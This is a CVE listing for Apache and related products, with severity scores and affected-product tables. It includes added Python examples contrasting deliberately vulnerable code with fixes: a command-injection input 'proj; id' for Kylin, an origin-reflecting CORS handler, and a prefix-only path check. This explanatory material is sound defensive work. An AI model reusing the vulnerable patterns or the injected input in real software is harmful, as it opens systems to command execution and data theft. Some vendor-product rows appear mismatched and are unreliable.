It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This allows attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.0 CRITICAL CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H 2.2 6.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-917,

Products Affected

Vendor Product Version
siemens comos *
siemens siveillance_vantage *
siemens energy_engage 3.1
siemens energyip 9.0
sonicwall email_security *
siemens sppa-t3000_ses3000_firmware *
siemens siveillance_identity 1.6
siemens energyip 8.6
siemens e-car_operation_center *
siemens industrial_edge_management *
intel sensor_solution_firmware_development_kit -
intel system_debugger -
siemens gma-manager *
siemens opcenter_intelligence *
apache log4j 2.0
siemens navigator *
intel datacenter_manager -
siemens spectrum_power_7 *
siemens desigo_cc_advanced_reports 4.1
siemens mendix *
siemens sipass_integrated 2.80
intel system_studio -
siemens industrial_edge_management_hub *
siemens tracealertserverplus *
siemens desigo_cc_advanced_reports 4.0
siemens 6bk1602-0aa52-0tp0_firmware *
siemens siguard_dsa 4.3
siemens solid_edge_harness_design *
siemens xpedition_enterprise -
intel secure_device_onboard -
siemens nx *
siemens siveillance_command *
siemens sipass_integrated 2.85
siemens siveillance_control_pro *
siemens teamcenter *
siemens siguard_dsa 4.2
siemens 6bk1602-0aa32-0tp0_firmware *
siemens energyip 8.7
siemens vesys 2019.1
siemens head-end_system_universal_device_integration_system *
siemens captial *
siemens spectrum_power_4 4.70
siemens energyip_prepay 3.7
siemens solid_edge_harness_design 2020
siemens siveillance_identity 1.5
siemens sentron_powermanager 4.2
intel computer_vision_annotation_tool -
intel genomics_kernel_library -
debian debian_linux 10.0
apache log4j *
siemens 6bk1602-0aa22-0tp0_firmware *
intel audio_development_kit -
siemens energyip 8.5
siemens spectrum_power_4 *
fedoraproject fedora 35
siemens desigo_cc_info_center 5.1
siemens captial 2019.1
siemens desigo_cc_advanced_reports 5.1
fedoraproject fedora 34
siemens 6bk1602-0aa42-0tp0_firmware *
siemens sentron_powermanager 4.1
siemens mindsphere *
siemens desigo_cc_info_center 5.0
siemens solid_edge_cam_pro *
intel oneapi -
debian debian_linux 11.0
siemens desigo_cc_advanced_reports 4.2
siemens operation_scheduler *
siemens 6bk1602-0aa12-0tp0_firmware *
siemens energyip_prepay 3.8
siemens desigo_cc_advanced_reports 5.0
siemens xpedition_package_integrator -
siemens logo!_soft_comfort *
siemens siguard_dsa 4.4
siemens vesys *
siemens siveillance_viewpoint *
siemens spectrum_power_7 2.30
CVE-2021-45105 MEDIUM

Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-674,

Products Affected

Vendor Product Version
oracle health_sciences_inform 6.2.1.1
oracle enterprise_manager_base_platform 13.4.0.0
oracle retail_price_management 15.0.3.0
oracle agile_engineering_data_management 6.2.1.0
oracle retail_customer_insights 16.0.2
sonicwall 6bk1602-0aa42-0tp0_firmware *
oracle retail_invoice_matching 15.0.3
sonicwall web_application_firewall *
oracle communications_network_charging_and_control *
oracle retail_store_inventory_management 14.1.3.5
oracle retail_integration_bus 15.0.3.1
oracle retail_service_backbone 14.1.3
oracle insurance_data_gateway 1.0.1
oracle hospitality_suite8 8.13.0
oracle retail_merchandising_system 19.0.1
oracle retail_returns_management 14.1
oracle communications_unified_inventory_management 7.3.5
oracle insurance_insbridge_rating_and_underwriting 5.2.0
oracle retail_order_management_system 19.5
oracle primavera_p6_enterprise_project_portfolio_management 21.12.0.0
oracle healthcare_foundation *
oracle weblogic_server 14.1.1.0.0
oracle banking_platform 2.6.2
oracle retail_service_backbone 15.0.3.1
oracle communications_session_route_manager *
oracle retail_price_management 16.0.3.0
oracle instantis_enterprisetrack 17.1
oracle hyperion_infrastructure_technology *
apache log4j *
oracle enterprise_manager_base_platform 13.5.0.0
oracle retail_predictive_application_server 16.0.3.240
oracle communications_session_report_manager *
oracle communications_webrtc_session_controller 7.2.0.0
oracle health_sciences_empirica_signal 9.2.0.0
oracle communications_pricing_design_center 12.0.0.4
oracle banking_platform 2.12.0
oracle communications_performance_intelligence_center 10.4.0.3
oracle retail_store_inventory_management 15.0.3.8
sonicwall 6bk1602-0aa32-0tp0_firmware *
oracle communications_element_manager *
oracle identity_management_suite 12.2.1.4.0
oracle primavera_unifier 20.12
oracle communications_webrtc_session_controller 7.2.1
oracle communications_cloud_native_core_unified_data_repository 1.15.0
oracle utilities_framework 4.4.0.3.0
oracle retail_service_backbone *
oracle retail_financial_integration *
oracle retail_integration_bus 19.0.1
oracle communications_pricing_design_center 12.0.0.5
oracle healthcare_data_repository 8.1.1
oracle retail_service_backbone 19.0.1.0
oracle communications_convergent_charging_controller *
oracle peoplesoft_enterprise_peopletools 8.59
oracle communications_convergence 3.0.2.2.0
oracle communications_unified_inventory_management 7.4.2
sonicwall email_security *
oracle retail_eftlink 20.0.1
oracle primavera_gateway *
oracle banking_trade_finance 14.5
oracle agile_plm 9.3.6
oracle communications_cloud_native_core_security_edge_protection_proxy 1.7.0
oracle hyperion_tax_provision *
oracle health_sciences_empirica_signal 9.1.0.6
oracle siebel_ui_framework *
oracle retail_integration_bus 14.1.3
oracle communications_services_gatekeeper 7.0
oracle communications_cloud_native_core_network_function_cloud_native_environment 1.10.0
oracle retail_eftlink 17.0.2
oracle retail_price_management 14.0.4
oracle hospitality_suite8 8.14.0
oracle communications_network_charging_and_control 6.0.1.0.0
oracle communications_cloud_native_core_network_slice_selection_function 1.8.0
oracle insurance_insbridge_rating_and_underwriting *
oracle primavera_unifier 19.12
oracle banking_deposits_and_lines_of_credit_servicing 2.12.0
oracle sql_developer *
oracle communications_cloud_native_core_policy 1.15.0
oracle communications_interactive_session_recorder 6.4
oracle retail_store_inventory_management 14.0.4.13
oracle retail_data_extractor_for_merchandising 16.0.2
sonicwall 6bk1602-0aa52-0tp0_firmware *
oracle banking_platform 2.7.1
oracle communications_eagle_ftp_table_base_retrieval 4.5
oracle webcenter_sites 12.2.1.4.0
oracle communications_cloud_native_core_service_communication_proxy 1.15.0
oracle retail_store_inventory_management 15.0.3.3
oracle financial_services_analytical_applications_infrastructure *
oracle flexcube_universal_banking *
debian debian_linux 10.0
oracle retail_integration_bus *
oracle banking_party_management 2.7.0
oracle retail_customer_insights 15.0.2
oracle retail_eftlink 21.0.0
oracle financial_services_model_management_and_governance 8.0.8.0.0
oracle utilities_framework *
oracle health_sciences_inform 7.0.0.0
oracle primavera_gateway 21.12.0
oracle weblogic_server 12.2.1.4.0
oracle retail_data_extractor_for_merchandising 15.0.2
oracle retail_order_broker 16.0
oracle retail_service_backbone 14.1.3.2
oracle retail_price_management 13.2
oracle retail_order_broker 18.0
oracle retail_store_inventory_management 16.0.3.7
oracle retail_eftlink 19.0.1
oracle communications_cloud_native_core_network_repository_function 1.15.1
oracle managed_file_transfer 12.2.1.4.0
oracle enterprise_manager_ops_center 12.4.0.0
oracle utilities_framework 4.4.0.0.0
oracle retail_central_office 14.1
oracle financial_services_model_management_and_governance 8.1.1.0.0
oracle communications_interactive_session_recorder 6.3
oracle retail_predictive_application_server 14.1.3.46
oracle instantis_enterprisetrack 17.3
oracle weblogic_server 12.2.1.3.0
oracle identity_management_suite 12.2.1.3.0
oracle taleo_platform *
oracle banking_payments 14.5
oracle webcenter_portal 12.2.1.3.0
oracle communications_convergent_charging_controller 6.0.1.0.0
oracle enterprise_manager_for_peoplesoft 13.4.1.1
oracle banking_loans_servicing 2.12.0
sonicwall 6bk1602-0aa12-0tp0_firmware *
oracle retail_invoice_matching 16.0.3
oracle communications_cloud_native_core_network_repository_function 1.15.0
oracle banking_treasury_management 14.5
oracle financial_services_model_management_and_governance 8.1.0.0.0
oracle communications_evolved_communications_application_server 7.1
oracle webcenter_sites 12.2.1.3.0
oracle hospitality_token_proxy_service 19.2
oracle retail_back_office 14.1
oracle communications_billing_and_revenue_management 12.0.0.5
oracle retail_integration_bus 14.1.3.2
oracle communications_diameter_signaling_router *
oracle communications_eagle_element_management_system 46.6
oracle hyperion_data_relationship_management *
oracle enterprise_manager_for_peoplesoft 13.5.1.1
oracle business_intelligence 5.5.0.0.0
oracle primavera_unifier 21.12
oracle health_sciences_information_manager *
oracle retail_financial_integration 19.0.1
oracle communications_billing_and_revenue_management 12.0.0.4
debian debian_linux 11.0
oracle retail_financial_integration 19.0.0
oracle retail_store_inventory_management 14.1.3.14
oracle communications_ip_service_activator 7.4.0
oracle instantis_enterprisetrack 17.2
oracle communications_messaging_server 8.1
oracle hyperion_profitability_and_cost_management *
oracle jdeveloper 12.2.1.4.0
oracle retail_integration_bus 19.0.0
oracle communications_cloud_native_core_console 1.9.0
oracle retail_eftlink 16.0.3
oracle banking_enterprise_default_management 2.7.1
oracle data_integrator 12.2.1.4.0
oracle primavera_p6_enterprise_project_portfolio_management *
oracle retail_merchandising_system 16.0.3
oracle retail_service_backbone 19.0.1
oracle healthcare_master_person_index 5.0.1
oracle insurance_insbridge_rating_and_underwriting 5.6.1.0
oracle agile_plm_mcad_connector 3.6
oracle primavera_unifier 18.8
oracle retail_price_management 14.1.3.0
oracle communications_user_data_repository 12.4
oracle webcenter_portal 12.2.1.4.0
oracle communications_convergence 3.0.3.0
oracle healthcare_translational_research 4.1.0
oracle payment_interface 19.1
oracle communications_asap 7.3
oracle retail_order_broker 19.1
oracle hyperion_bi+ *
oracle managed_file_transfer 12.2.1.3.0
oracle retail_service_backbone 19.0.0
oracle autovue_for_agile_product_lifecycle_management 21.0.2
oracle hyperion_planning *
oracle utilities_framework 4.4.0.2.0
oracle retail_financial_integration 14.1.3.2
oracle banking_enterprise_default_management 2.12.0
oracle flexcube_universal_banking 14.5
oracle communications_unified_inventory_management 7.4.1
sonicwall 6bk1602-0aa22-0tp0_firmware *
oracle e-business_suite 12.2
oracle healthcare_translational_research 4.1.1
oracle peoplesoft_enterprise_peopletools 8.58
oracle retail_financial_integration 15.0.3.1
oracle mysql_enterprise_monitor *
oracle retail_predictive_application_server 15.0.3.115
oracle payment_interface 20.3
oracle communications_service_broker 6.2
oracle communications_network_integrity 7.3.6
oracle identity_manager_connector 9.1.0
oracle management_cloud_engine 1.5.0
sonicwall network_security_manager *
oracle flexcube_universal_banking 11.83.3
oracle retail_eftlink 18.0.1
oracle retail_point-of-service 14.1
oracle health_sciences_inform 6.3.2.1
netapp cloud_manager -
oracle data_integrator 12.2.1.3.0
CVE-2021-45229 MEDIUM

It was discovered that the "Trigger DAG with config" screen was susceptible to XSS attacks via the `origin` query argument. This issue affects Apache Airflow versions 2.2.3 and below.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2021-45230 MEDIUM

In Apache Airflow prior to 2.2.0, a user who has "can_create" permissions on DAG Runs can create DAG Runs for DAGs that they don't have "edit" permissions for.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache airflow *
CVE-2021-45232 HIGH

In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks: the framework `droplet` is introduced on top of the framework `gin`. All APIs and the authentication middleware are developed on `droplet`, but some APIs use the `gin` interface directly, thus bypassing the authentication.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache apisix_dashboard *
CVE-2021-45456 HIGH

Apache Kylin checks the legitimacy of the project before executing some commands with the project name passed in by the user. There is a mismatch between what is being checked and what is being used as the shell command argument in DiagnosisService. This may let an illegal project name pass the check and still reach the shell command, resulting in a command injection vulnerability. This issue affects Apache Kylin 4.0.0.
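
The general shape of this bug is that the validated value and the value that reaches the shell are not the same string. The added example below is not Kylin code and invents one plausible mismatch for illustration: a regular expression applied with `re.match`, which anchors only at the start, so a legal prefix lets the rest of the string through. `shell_commands` tokenises the resulting command line the way a POSIX shell would, which makes the injected second command visible without executing anything. The script name `bin/diag.sh` is an assumption.

```python
import re
import shlex

# Hypothetical check in the vulnerable version: re.match anchors only at the start,
# so "proj; id" passes because "proj" is a legal prefix.
PROJECT_PREFIX = re.compile(r"[A-Za-z0-9_]+")
# Hardened check: the whole string must be a legal project name.
PROJECT_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")

DIAG_TOOL = "bin/diag.sh"   # assumed name of the diagnosis script


def diag_command_vulnerable(project):
    """Validate a prefix of the name, then hand the whole, unvalidated string
    to a shell as part of one command line (the check/use mismatch)."""
    if not PROJECT_PREFIX.match(project):
        raise ValueError("illegal project name")
    return f"{DIAG_TOOL} {project}"      # would be run through a shell


def diag_argv_safe(project):
    """Validate exactly the value that is used, and pass it as one argv element
    (subprocess.run(argv) without shell=True), so shell metacharacters are inert."""
    if not PROJECT_NAME.fullmatch(project):
        raise ValueError("illegal project name")
    return [DIAG_TOOL, project]


def shell_commands(cmdline):
    """Tokenise cmdline as a POSIX shell would and return the separate commands it
    would run, so an injection can be observed rather than executed."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands
```

For the input `proj; id` the vulnerable builder produces a line the shell would run as two commands, `bin/diag.sh proj` and `id`; the hardened version rejects the same input and, for a legal name, yields an argv list in which the name can never be parsed as anything but one argument.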

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache kylin 4.0.0
CVE-2021-45457 MEDIUM

In Apache Kylin, cross-origin requests with credentials are allowed to be sent from any origin. This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.
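
What "credentialed requests from any origin" means in practice: the server echoes whatever `Origin` header arrives together with `Access-Control-Allow-Credentials: true`, so a page on an attacker's site can make the victim's browser send the Kylin session cookie and read the response. The added example below is not Kylin code; it contrasts the reflecting handler with an exact-match allowlist and includes the browser's own acceptance rule so the two can be compared offline. The allowed origin and the attacker origin are assumed values.

```python
# Assumed trusted UI origin; anything else must not get a credentialed response.
ALLOWED_ORIGINS = frozenset({"https://kylin-ui.example"})


def cors_headers_vulnerable(origin):
    """Reflect any Origin and allow credentials: every site on the web can make
    a credentialed request and read the response."""
    if origin is None:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def cors_headers_safe(origin):
    """Only an exact allowlist match gets CORS headers (no prefix or suffix
    matching). Vary: Origin stops caches handing one origin's headers to another."""
    if origin not in ALLOWED_ORIGINS:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


def browser_allows_credentialed_read(page_origin, response_headers):
    """The browser's rule for a credentialed cross-origin response: the allowed
    origin must equal the page's origin exactly ("*" is rejected) and credentials
    must be explicitly allowed."""
    acao = response_headers.get("Access-Control-Allow-Origin")
    acac = response_headers.get("Access-Control-Allow-Credentials")
    return acao == page_origin and acac == "true"


def cross_site_read_allowed(handler, page_origin):
    """Would a page at page_origin be able to read a credentialed response
    produced by handler? Simulates one request/response pair."""
    return browser_allows_credentialed_read(page_origin, handler(page_origin))
```

Against the reflecting handler a page at `https://evil.example` reads the response; against the allowlist it does not, and neither does a look-alike origin such as `https://kylin-ui.example.evil.example`, because membership is tested on the whole string. The browser rule also shows why `Access-Control-Allow-Origin: *` is not a usable shortcut when credentials are involved.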

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache kylin 4.0.0
apache kylin *
CVE-2021-45458 MEDIUM

Apache Kylin provides encryption classes PasswordPlaceholderConfigurer to help users encrypt their passwords. In the encryption algorithm used by this encryption class, the cipher is initialized with a hardcoded key and IV. If users use class PasswordPlaceholderConfigurer to encrypt their password and configure it into kylin's configuration file, there is a risk that the password may be decrypted. This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-798,CWE-330,

Products Affected

Vendor Product Version
apache kylin 4.0.0
apache kylin *
CVE-2022-22719 MEDIUM

A carefully crafted request body can cause a read to a random memory area which could cause the process to crash. This issue affects Apache HTTP Server 2.4.52 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-665,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
apple macos *
oracle zfs_storage_appliance_kit 8.8
fedoraproject fedora 36
apple mac_os_x 10.15.7
CVE-2022-22720 HIGH

Apache HTTP Server 2.4.52 and earlier fails to close the inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-444,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
apple macos *
oracle zfs_storage_appliance_kit 8.8
fedoraproject fedora 36
apple mac_os_x 10.15.7
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2022-22721 MEDIUM

If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-190,

Products Affected

Vendor Product Version
apache http_server *
apple mac_os_x *
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
apple macos *
oracle enterprise_manager_ops_center 12.4.0.0
fedoraproject fedora 35
fedoraproject fedora 34
oracle zfs_storage_appliance_kit 8.8
fedoraproject fedora 36
apple mac_os_x 10.15.7
CVE-2022-22728

A flaw in Apache libapreq2 versions 2.16 and earlier could cause a buffer overflow while processing multipart form uploads. A remote attacker could send a request causing a process crash which could lead to a denial of service attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 37
apache libapreq2 *
fedoraproject fedora 36
debian debian_linux 10.0
CVE-2022-22733 MEDIUM

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has a guest account to escalate privileges. This issue affects Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache shardingsphere_elasticjob-ui 3.0.0
CVE-2022-22931 MEDIUM

The fix for CVE-2021-40525 in Apache James does not prepend delimiters upon valid directory validations. Affected implementations include the maildir mailbox store and the Sieve file repository. This enables a user to access other users' data stores (limited to user names that are prefixed by the value of the user name being used).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache james 3.6.1
CVE-2022-22932 MEDIUM

Apache Karaf obr:* commands and the run goal on the karaf-maven-plugin have a partial path traversal which allows breaking out of the expected folder. The risk is low as the obr:* commands are rarely used and the entry is set by the user. This has been fixed in revisions https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 and https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf. Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use a correct path. JIRA ticket: https://issues.apache.org/jira/browse/KARAF-7326
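
This entry and CVE-2022-22931 (Apache James, above) are the same "partial path traversal": containment is tested with a plain string-prefix check, so a path that merely begins with the base string passes, which is exactly why James user `bo` could reach the store of user `bob`. The added example below belongs to neither project; it shows the flawed test beside the fixed one (the base plus a trailing separator, after `normpath` has collapsed any `..`) on a constructed per-user mailbox layout. The root directory and user names are assumptions, and `posixpath` is used so the behaviour is the same on every platform.

```python
import posixpath

MAILBOX_ROOT = "/srv/mail"   # assumed layout: one directory per user


def inside_vulnerable(base, candidate):
    """Prefix test with no delimiter: every path that merely begins with the
    base string passes, including a sibling directory whose name extends it."""
    return posixpath.normpath(candidate).startswith(posixpath.normpath(base))


def inside_safe(base, candidate):
    """The candidate must be the base itself or start with base plus a separator.
    normpath runs first so ../ segments cannot carry the path past the base.
    (Symlinks are out of scope here; resolve with os.path.realpath when they
    matter.)"""
    base_n = posixpath.normpath(base)
    cand_n = posixpath.normpath(candidate)
    return cand_n == base_n or cand_n.startswith(base_n.rstrip("/") + "/")


def mailbox_path_for(user, relative, check=inside_safe):
    """Resolve a user-relative mailbox path, refusing anything outside that
    user's directory. `check` selects the vulnerable or the fixed containment test."""
    user_dir = posixpath.join(MAILBOX_ROOT, user)
    target = posixpath.normpath(posixpath.join(user_dir, relative))
    if not check(user_dir, target):
        raise PermissionError(f"{target} is outside {user_dir}")
    return target
```

With the prefix check, user `bo` asking for `../bob/cur/1` resolves to `/srv/mail/bob/cur/1`, which starts with `/srv/mail/bo` and is accepted; with the delimiter check the same request is refused while `cur/1` inside `bo`'s own directory still works. `os.path.commonpath([base, candidate]) == base` is an equivalent formulation of the fixed test.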

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache karaf *
CVE-2022-23181 LOW

The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability into Apache Tomcat 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue is only exploitable when Tomcat is configured to persist sessions using the FileStore.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: LOW

Problem Type: CWE-367,

Products Affected

Vendor Product Version
apache tomcat 10.1.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
apache tomcat 10.0.0
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle managed_file_transfer 12.2.1.4.0
debian debian_linux 11.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
apache tomcat *
oracle communications_cloud_native_core_policy 1.15.0
oracle managed_file_transfer 12.2.1.3.0
oracle mysql_enterprise_monitor *
CVE-2022-23206 MEDIUM

In Apache Traffic Control Traffic Ops prior to 6.1.0 or 5.1.6, an unprivileged user who can reach Traffic Ops over HTTPS can send a specially-crafted POST request to /user/login/oauth to scan a port of a server that Traffic Ops can reach.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache traffic_control *
CVE-2022-23223 MEDIUM

On Apache ShenYu versions 2.4.0 and 2.4.1, an endpoint existed that disclosed the passwords of all users. Users are recommended to upgrade to version 2.4.2 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.4.1
CVE-2022-23302 MEDIUM

JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle advanced_supply_chain_planning 12.1
oracle communications_unified_inventory_management 7.4.2
oracle tuxedo 12.2.2.0.0
oracle e-business_suite_cloud_manager_and_cloud_backup_module 2.2.1.1.1
oracle hyperion_infrastructure_technology *
apache log4j *
oracle communications_instant_messaging_server 10.0.1.5.0
oracle enterprise_manager_base_platform 13.5.0.0
oracle communications_unified_inventory_management 7.4.1
oracle hyperion_data_relationship_management *
oracle business_intelligence 12.2.1.4.0
qos reload4j *
oracle financial_services_revenue_management_and_billing_analytics 2.8.0.0
oracle mysql_enterprise_monitor *
netapp snapmanager -
oracle weblogic_server 12.2.1.4.0
oracle business_intelligence 5.9.0.0.0
oracle identity_management_suite 12.2.1.4.0
oracle jdeveloper 12.2.1.3.0
oracle business_intelligence 12.2.1.3.0
oracle communications_offline_mediation_controller *
oracle weblogic_server 12.2.1.3.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.1
oracle identity_management_suite 12.2.1.3.0
oracle communications_network_integrity 7.3.6
oracle e-business_suite_cloud_manager_and_cloud_backup_module *
oracle healthcare_foundation 8.1.0
oracle middleware_common_libraries_and_tools 12.2.1.4.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.0
broadcom brocade_sannav -
oracle communications_offline_mediation_controller 12.0.0.5.0
oracle business_process_management_suite 12.2.1.4.0
oracle advanced_supply_chain_planning 12.2
oracle weblogic_server 14.1.1.0.0
oracle communications_messaging_server 8.1
oracle communications_eagle_ftp_table_base_retrieval 4.5
oracle identity_manager_connector 11.1.1.5.0
CVE-2022-23305 MEDIUM

